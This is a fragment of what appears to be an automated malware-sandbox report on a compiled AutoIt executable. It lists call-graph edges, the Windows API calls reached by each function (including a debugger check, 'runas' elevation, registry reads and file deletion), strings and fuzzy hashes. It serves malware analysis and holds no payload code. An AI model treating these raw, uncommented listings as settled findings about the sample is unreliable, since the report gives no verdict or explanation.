___strgtold12_l 58 API calls 99742->99746 99744 1a8d68 ___strgtold12_l 58 API calls 99743->99744 99747 1b5ecb 99744->99747 99745->99675 99748 1b5f00 99746->99748 99747->99675 99749 1a8ff6 ___strgtold12_l 9 API calls 99748->99749 99749->99747 99750->99652 99751->99695 99752->99661 99753->99659 99754->99661 99755->99670 99756->99679 99757->99695 99758->99672 99759->99697 99760->99709 99761->99697 99762->99711 99763->99714 99764->99691 99765->99697 99766->99656 99767->99659 99768->99695 
[Execution graph: the serialized node and edge data of the interactive call-graph view is omitted. The graph nodes carry function addresses and the imported API names reached from them, including CreateFileW, ReadFile, SetFilePointerEx, WriteFile, CloseHandle, VirtualAlloc, VirtualFree, GetPEB, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, IsWow64Process, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, OleInitialize, CreateThread, Shell_NotifyIconW, RegisterWindowMessageW, VariantClear and CharUpperBuffW.]

              Control-flow Graph

              APIs
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B7A
              • IsDebuggerPresent.KERNEL32 ref: 00183B8C
              • GetFullPathNameW.KERNEL32(00007FFF,?,?,002462F8,002462E0,?,?), ref: 00183BFD
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 00190A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C26,002462F8,?,?,?), ref: 00190ACE
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00183C81
              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002393F0,00000010), ref: 001BD4BC
              • SetCurrentDirectoryW.KERNEL32(?,002462F8,?,?,?), ref: 001BD4F4
              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00235D40,002462F8,?,?,?), ref: 001BD57A
              • ShellExecuteW.SHELL32(00000000,?,?), ref: 001BD581
                • Part of subcall function 00183A58: GetSysColorBrush.USER32(0000000F), ref: 00183A62
                • Part of subcall function 00183A58: LoadCursorW.USER32(00000000,00007F00), ref: 00183A71
                • Part of subcall function 00183A58: LoadIconW.USER32(00000063), ref: 00183A88
                • Part of subcall function 00183A58: LoadIconW.USER32(000000A4), ref: 00183A9A
                • Part of subcall function 00183A58: LoadIconW.USER32(000000A2), ref: 00183AAC
                • Part of subcall function 00183A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AD2
                • Part of subcall function 00183A58: RegisterClassExW.USER32(?), ref: 00183B28
                • Part of subcall function 001839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A15
                • Part of subcall function 001839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A36
                • Part of subcall function 001839E7: ShowWindow.USER32(00000000,?,?), ref: 00183A4A
                • Part of subcall function 001839E7: ShowWindow.USER32(00000000,?,?), ref: 00183A53
                • Part of subcall function 001843DB: _memset.LIBCMT ref: 00184401
                • Part of subcall function 001843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001844A6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
              • String ID: This is a third-party compiled AutoIt script.$runas$%!
              • API String ID: 529118366-3827880107
              • Opcode ID: 70ca3a09d9a3e62979c77097ef46b5d6f9b7412449b4b016a389ce70e19f73c9
              • Instruction ID: 03ca745203fd0f668a7f44f54045550274a702e47ee4da4dd2169077d9400387
              • Opcode Fuzzy Hash: 70ca3a09d9a3e62979c77097ef46b5d6f9b7412449b4b016a389ce70e19f73c9
              • Instruction Fuzzy Hash: 4951E374A04249BFCF1AFBB4EC4DAED7B74AB16700F144165F861A21A2DBB08745CF22

              Control-flow Graph

              APIs
              • GetVersionExW.KERNEL32(?), ref: 00184B2B
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • GetCurrentProcess.KERNEL32(?,0020FAEC,00000000,00000000,?), ref: 00184BF8
              • IsWow64Process.KERNEL32(00000000), ref: 00184BFF
              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00184C45
              • FreeLibrary.KERNEL32(00000000), ref: 00184C50
              • GetSystemInfo.KERNEL32(00000000), ref: 00184C81
              • GetSystemInfo.KERNEL32(00000000), ref: 00184C8D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
              • String ID:
              • API String ID: 1986165174-0
              • Opcode ID: 1bcdd115bb6a1082a49f033411fbda44d9242439f6f12a3cf4782ac89b182eb1
              • Instruction ID: c38af92a25308572ba4ed16473ac9edb30c4cbff0a4ab7372378909c575fb140
              • Opcode Fuzzy Hash: 1bcdd115bb6a1082a49f033411fbda44d9242439f6f12a3cf4782ac89b182eb1
              • Instruction Fuzzy Hash: 6C91E53154ABC1DFC735DB7895511AAFFE4AF2A300B484D9ED0CB83A41D721EA08CB69

              Control-flow Graph

              APIs
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00184EEE,?,?,00000000,00000000), ref: 00184FF9
              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00184EEE,?,?,00000000,00000000), ref: 00185010
              • LoadResource.KERNEL32(?,00000000,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F), ref: 001BDD60
              • SizeofResource.KERNEL32(?,00000000,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F), ref: 001BDD75
              • LockResource.KERNEL32(00184EEE,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F,00000000), ref: 001BDD88
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
              • String ID: SCRIPT
              • API String ID: 3051347437-3967369404
              • Opcode ID: 2b9a13c04697c4616957d0418a90f329120d75fd15157106958bcd750cdb39fe
              • Instruction ID: 9a66791de611bdaf73e5d58982bbdc9a3e895872855262b8bd934c39ab91d1ea
              • Opcode Fuzzy Hash: 2b9a13c04697c4616957d0418a90f329120d75fd15157106958bcd750cdb39fe
              • Instruction Fuzzy Hash: 5A115A75240700AFD7319B65ED58F677BBAEBC9B51F208168F806966A0DB61E8008A60
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: Dt$$Dt$$Dt$$Dt$$Variable must be of type 'Object'.
              • API String ID: 0-2211162405
              • Opcode ID: 21faca3bfed998b019cabf053458f553931800358dd5a91d5759cd196cbead95
              • Instruction ID: ad9a08fba476d31a70044156423022d49632e5bbd1521ebb02fde78640175130
              • Opcode Fuzzy Hash: 21faca3bfed998b019cabf053458f553931800358dd5a91d5759cd196cbead95
              • Instruction Fuzzy Hash: B0A26974A04215CFCB28EF98C480AADB7F2BF59304F258469E916AB351D771EE42CF91
              APIs
              • GetFileAttributesW.KERNELBASE(?,001BE7C1), ref: 001E46A6
              • FindFirstFileW.KERNELBASE(?,?), ref: 001E46B7
              • FindClose.KERNEL32(00000000), ref: 001E46C7
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileFind$AttributesCloseFirst
              • String ID:
              • API String ID: 48322524-0
              • Opcode ID: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
              • Instruction ID: b02d26fbccb00d236b490a24d0952fe8e0371e95728df409319727971751c105
              • Opcode Fuzzy Hash: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
              • Instruction Fuzzy Hash: 64E0D8318109005B8220B738FC4D4EE775C9E0A335F100715F975C18E1E7B069508599
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190BBB
              • timeGetTime.WINMM ref: 00190E76
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190FB3
              • TranslateMessage.USER32(?), ref: 00190FC7
              • DispatchMessageW.USER32(?), ref: 00190FD5
              • Sleep.KERNEL32(0000000A), ref: 00190FDF
              • LockWindowUpdate.USER32(00000000,?,?), ref: 0019105A
              • DestroyWindow.USER32 ref: 00191066
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00191080
              • Sleep.KERNEL32(0000000A,?,?), ref: 001C52AD
              • TranslateMessage.USER32(?), ref: 001C608A
              • DispatchMessageW.USER32(?), ref: 001C6098
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001C60AC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$$pr$$pr$$pr$
              • API String ID: 4003667617-300143931
              • Opcode ID: 995d3caf73903df0ec47d994deea7815274a228dc997bc23c654d29b4ed5e426
              • Instruction ID: 59e531b9140b529d6b21ceef33a5259d527e8f2ec1c281cf51b4abeccdf0d1c3
              • Opcode Fuzzy Hash: 995d3caf73903df0ec47d994deea7815274a228dc997bc23c654d29b4ed5e426
              • Instruction Fuzzy Hash: 01B2B270608741DFDB29DF24C884FAABBE5BFA5304F14491DF49A87291DB71E984CB82

              Control-flow Graph

              APIs
                • Part of subcall function 001E91E9: __time64.LIBCMT ref: 001E91F3
                • Part of subcall function 00185045: _fseek.LIBCMT ref: 0018505D
              • __wsplitpath.LIBCMT ref: 001E94BE
                • Part of subcall function 001A432E: __wsplitpath_helper.LIBCMT ref: 001A436E
              • _wcscpy.LIBCMT ref: 001E94D1
              • _wcscat.LIBCMT ref: 001E94E4
              • __wsplitpath.LIBCMT ref: 001E9509
              • _wcscat.LIBCMT ref: 001E951F
              • _wcscat.LIBCMT ref: 001E9532
                • Part of subcall function 001E922F: _memmove.LIBCMT ref: 001E9268
                • Part of subcall function 001E922F: _memmove.LIBCMT ref: 001E9277
              • _wcscmp.LIBCMT ref: 001E9479
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AAE
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AC1
              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E96DC
              • _wcsncpy.LIBCMT ref: 001E974F
              • DeleteFileW.KERNEL32(?,?), ref: 001E9785
              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001E979B
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E97AC
              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E97BE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
              • String ID:
              • API String ID: 1500180987-0
              • Opcode ID: b49a124899a435a0730ff8d28eeca0543e917ccfd73af7fe9873b8468960b252
              • Instruction ID: e9fd979a91ff82cd82144dd93f103865aefb0fe8a320d2a731110be32e9f767a
              • Opcode Fuzzy Hash: b49a124899a435a0730ff8d28eeca0543e917ccfd73af7fe9873b8468960b252
              • Instruction Fuzzy Hash: 8EC13BB1D00619AECF21DF95CC85ADEB7BDEF59300F1040AAF609E7151EB709A848F65

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183074
              • RegisterClassExW.USER32(00000030), ref: 0018309E
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
              • InitCommonControlsEx.COMCTL32(?), ref: 001830CC
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
              • LoadIconW.USER32(000000A9), ref: 001830F2
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: 2424af76ca57a0908dd976a2db8f3c77ceeb28bb9c0facbb2982ec5031d9374b
              • Instruction ID: a68a998bb7a92538729a5aaa9c7278c0b50d4696cf1b2c378f4fdee2dafbf1eb
              • Opcode Fuzzy Hash: 2424af76ca57a0908dd976a2db8f3c77ceeb28bb9c0facbb2982ec5031d9374b
              • Instruction Fuzzy Hash: 113169B5884349AFDB51CFA4E98DAD9BFF0FB0A310F14416AE580E62A1D3B50545CF52

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183074
              • RegisterClassExW.USER32(00000030), ref: 0018309E
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
              • InitCommonControlsEx.COMCTL32(?), ref: 001830CC
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
              • LoadIconW.USER32(000000A9), ref: 001830F2
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: 6b38da8655c155b630bca62e5eae8a453a8dbd484402290a4d0823fd338ad57b
              • Instruction ID: 345a061978ea0bbd473faa09d43d1657826857ebb1772dc10085a71ee45a4750
              • Opcode Fuzzy Hash: 6b38da8655c155b630bca62e5eae8a453a8dbd484402290a4d0823fd338ad57b
              • Instruction Fuzzy Hash: 4321F4B5990308AFDB50DFA4FD8CB9DBBF5FB0A700F00412AF910A66A1D7B145448F92

              Control-flow Graph

              APIs
                • Part of subcall function 00184864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002462F8,?,001837C0,?), ref: 00184882
                • Part of subcall function 001A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001872C5), ref: 001A0771
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00187308
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001BECF1
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001BED32
              • RegCloseKey.ADVAPI32(?), ref: 001BED70
              • _wcscat.LIBCMT ref: 001BEDC9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
              • API String ID: 2673923337-2727554177
              • Opcode ID: 3beb54ff58271bce5211921db114d75db489a03281a51b9980c49bf3c0a3b883
              • Instruction ID: 9f8a0aff158291952602d5dee92980045372a33067cba0547408ff1f64083feb
              • Opcode Fuzzy Hash: 3beb54ff58271bce5211921db114d75db489a03281a51b9980c49bf3c0a3b883
              • Instruction Fuzzy Hash: EA7171755083019EC314EF65EC8589BB7E8FF6A740F54492EF855831A1DBB0DA48CFA2

              Control-flow Graph

              APIs
              • DefWindowProcW.USER32(?,?,?,?), ref: 001836D2
              • KillTimer.USER32(?,00000001), ref: 001836FC
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0018371F
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0018372A
              • CreatePopupMenu.USER32 ref: 0018373E
              • PostQuitMessage.USER32(00000000), ref: 0018375F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
              • String ID: TaskbarCreated$%!
              • API String ID: 129472671-72691048
              • Opcode ID: 625917fbe11ef33e427d325ed64331c076d61c281fd8f07722c4e6e76ce3cfd3
              • Instruction ID: 969a5362b3ad657189755df11889820fa0bc587b5aad8664de1114d19c915be5
              • Opcode Fuzzy Hash: 625917fbe11ef33e427d325ed64331c076d61c281fd8f07722c4e6e76ce3cfd3
              • Instruction Fuzzy Hash: 614108B1200545BBDB28BF28FC4DB7D3755E712B00F280529F912862B2EBA1DF559B63

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183A62
              • LoadCursorW.USER32(00000000,00007F00), ref: 00183A71
              • LoadIconW.USER32(00000063), ref: 00183A88
              • LoadIconW.USER32(000000A4), ref: 00183A9A
              • LoadIconW.USER32(000000A2), ref: 00183AAC
              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AD2
              • RegisterClassExW.USER32(?), ref: 00183B28
                • Part of subcall function 00183041: GetSysColorBrush.USER32(0000000F), ref: 00183074
                • Part of subcall function 00183041: RegisterClassExW.USER32(00000030), ref: 0018309E
                • Part of subcall function 00183041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
                • Part of subcall function 00183041: InitCommonControlsEx.COMCTL32(?), ref: 001830CC
                • Part of subcall function 00183041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
                • Part of subcall function 00183041: LoadIconW.USER32(000000A9), ref: 001830F2
                • Part of subcall function 00183041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: 9ae745bc8f03e6309eccb1522d4677be1b70cf677aed691b1120b40234a2f054
              • Instruction ID: ccd4ba16790b2f1c727b94a7cfe85040f98aee273c7f2248d5c82143cc2b2630
              • Opcode Fuzzy Hash: 9ae745bc8f03e6309eccb1522d4677be1b70cf677aed691b1120b40234a2f054
              • Instruction Fuzzy Hash: BC213778940308BFEB10DFA4FD4DB9D7BB5FB0A711F00012AE904A62A1D3BA56548F86

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b$
              • API String ID: 1825951767-1989799342
              • Opcode ID: 6b036a08011831c54eb505920a154f1175b4541b9eac1139e3efa4b433a5853c
              • Instruction ID: 1cfba9009d382f888eda8dc7c157c0bebe02ae616af432fc0ff7cce76478ed7a
              • Opcode Fuzzy Hash: 6b036a08011831c54eb505920a154f1175b4541b9eac1139e3efa4b433a5853c
              • Instruction Fuzzy Hash: 19A16075D10229ABCB08FBA0DC95AEEB778BF25700F540529F422A7191EF749B09CF61

              APIs
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A03D3
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001A03DB
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A03E6
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A03F1
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001A03F9
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001A0401
                • Part of subcall function 00196259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0018FA90), ref: 001962B4
              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0018FB2D
              • OleInitialize.OLE32(00000000), ref: 0018FBAA
              • CloseHandle.KERNEL32(00000000), ref: 001C49F2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
